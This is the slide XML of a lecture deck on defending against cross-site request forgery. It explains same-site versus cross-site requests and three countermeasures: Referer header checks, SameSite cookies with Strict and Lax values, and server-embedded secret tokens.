            <a:pPr marL="574675" lvl="1" indent="-231775"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Same-site request: coming from the server’s own page. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Trusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-231775"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Cross-site request: coming from other site’s pages. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Not Trusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-231775"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>We cannot treat these two types of requests the same.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="304020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332656"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How to Defeat CSRF?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1115616" y="1099332"/>
            <a:ext cx="7416824" cy="5758668"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="231775" indent="-231775"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Differentiate the two types of requests!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="231775" indent="-231775"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Does the browser know the difference?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-231775"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Of course. The browser knows from which page a request is generated.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-231775"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Can browser help?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23171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332656"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Countermeasures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1115616" y="1099332"/>
            <a:ext cx="7416824" cy="5758668"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="231775" indent="-231775"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>How to help server?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-231775"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> header (browser’s help)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-231775"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Same-site cookie (browser’s help)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-231775"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Secret token (the server helps itself to defend against CSRF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="105119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1043608" y="404664"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Countermeasure: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> Header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B75F2361-67BE-B242-8EB1-34F96C1918E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1547664" y="1700808"/>
            <a:ext cx="7072294" cy="3456384"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1206904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1043608" y="476672"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Countermeasure: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> Header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191" name="Shape 191"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1091960" y="1536633"/>
            <a:ext cx="7512488" cy="4555200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP header field identifying the address of the web page from where the request is generated.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A server can check whether the request is originated from its own pages or not.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This field reveals part of browsing history causing privacy concern and hence, this field is mostly removed from the header.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The server cannot use this unreliable source.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2395507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899592" y="476672"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-69850">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Countermeasure: Same-Site Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197" name="Shape 197"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="875267" y="1251856"/>
            <a:ext cx="8017213" cy="3897300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A special type of cookie in browsers like Chrome and Opera, which provide a special attribute to cookies called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SameSite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EC1C2F0-037E-5440-A25E-BE782E502FF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1991117" y="3068960"/>
            <a:ext cx="5533211" cy="3502294"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AB594C8-5965-574C-85E7-FCD7772A6D9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2921126" y="2797160"/>
            <a:ext cx="3925493" cy="358902"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="181560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899592" y="476672"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-69850">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Countermeasure: Same-Site Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197" name="Shape 197"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="875267" y="1251856"/>
            <a:ext cx="8017213" cy="3897300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This attribute is set by the server and it tells the browsers whether a cookie should be attached to a cross-site request or not.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cookies with this attribute are always sent along with same-site requests, but whether they are sent along with cross-site depends on the value of this attribute.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strict (Not sent along with cross-site requests)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lax (Sent with cross-site requests only for top-level navigation) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2579505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209926" y="2400732"/>
            <a:ext cx="7498080" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="4800" dirty="0">
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Cross-Site Requests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3939127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1043608" y="548680"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-69850">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Countermeasure: Secret Token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="203" name="Shape 203"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899592" y="1319920"/>
            <a:ext cx="7560840" cy="3897300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The server embeds a random secret value inside each web page. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FAE16B8-891E-AA43-A076-511A4F6CB71E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1043609" y="2348880"/>
            <a:ext cx="8100392" cy="393988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="56550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1043608" y="548680"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-69850">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Countermeasure: Secret Token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="203" name="Shape 203"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899592" y="1319920"/>
            <a:ext cx="7560840" cy="3897300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>When a request is initiated from this page, the secret value is included with the request. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The server checks this value to see whether a request is cross-site or not.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="197376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1043608" y="548680"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-69850">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Countermeasure: Secret Token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="203" name="Shape 203"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899592" y="1319920"/>
            <a:ext cx="7992888" cy="3897300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
